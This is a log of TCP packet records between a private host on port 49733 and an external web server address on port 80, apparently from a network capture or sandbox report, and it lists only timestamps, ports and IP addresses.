Apr 25, 2024 09:04:02.042843103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042879105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042890072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042912960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042959929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042972088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043011904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043040991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043057919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043107986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043135881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043174028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043196917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043217897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043231010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043241978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043263912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043277979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043344975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043395042 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043427944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043463945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043493986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043507099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043540955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043561935 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043562889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043575048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043596983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043606043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043618917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043678999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043701887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043724060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043770075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043776989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043808937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043840885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.043843985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043916941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043930054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043977976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043988943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.043997049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044011116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044034004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044065952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044117928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044133902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044150114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044174910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044253111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044305086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044313908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044365883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044378042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044446945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044456959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044487000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044513941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044534922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044595003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044605017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044617891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044667006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044678926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044686079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044717073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044728994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044759035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044759035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044766903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044821024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044893026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044939041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.044955015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.044976950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045011997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045032024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045062065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045094013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045140982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045182943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045233965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045243025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045300961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045306921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045351028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045375109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045392036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045452118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045480967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045492887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045538902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045538902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045540094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045592070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045622110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045650959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045661926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045732975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045746088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045772076 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045792103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045821905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045841932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045901060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045929909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.045942068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.045991898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046041012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046055079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046086073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046096087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046158075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046195984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046236992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046243906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046253920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046272993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046324015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046335936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046365976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046391010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046401978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046411991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046463966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046510935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046523094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046557903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046608925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046611071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046654940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046704054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046706915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046720028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046762943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046766043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046834946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046847105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046859026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046905994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046910048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046910048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.046919107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046977997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.046991110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047007084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047043085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047046900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047074080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047121048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047190905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047194004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047235012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047240973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047255039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047305107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047342062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047391891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047405005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047431946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047473907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047518969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047518969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047601938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047647953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047667980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047713041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047713041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047719955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047755003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047797918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047848940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047863007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047907114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.047908068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.047966003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048007011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048094034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048116922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048140049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048151970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048181057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048233032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048233032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048233032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048233032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048243999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048294067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048305988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048377991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048389912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048427105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048429012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048465967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048547029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048559904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048598051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048603058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048624039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048625946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048635960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048665047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048738003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048748970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048760891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048777103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048783064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048805952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048885107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048897028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048916101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048933983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048957109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.048985004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.048990011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049057007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049069881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049099922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049119949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049119949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049141884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049174070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049197912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049226999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049247026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049258947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049266100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049328089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049335003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049403906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049459934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049501896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049520016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049537897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049551010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049619913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049649954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049711943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049716949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049803019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049812078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049904108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049916029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049948931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.049977064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.049998045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050021887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050041914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050120115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050132036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050143003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050257921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050270081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050282955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050317049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050334930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050353050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050358057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050370932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050403118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050412893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050466061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050478935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050551891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050563097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050586939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050586939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050620079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050647974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050663948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050685883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050708055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050724983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050750017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050766945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050805092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050817966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050878048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.050884962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.050951958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051007986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051055908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051091909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051091909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051114082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051146030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051207066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051249027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051261902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051284075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051284075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051347971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051359892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051388979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051404953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051417112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051465988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051479101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051517010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051537991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051589012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051628113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051656008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051675081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051690102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051690102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051731110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051774025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051785946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051798105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051810980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051831961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051852942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051853895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051886082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.051970959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051983118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.051995039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052006960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052017927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052028894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052052975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052062035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052118063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052160025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052191019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052215099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052227020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052227020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052248955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052304983 CEST	80	49733	176.97.76.106	192.168.2.4
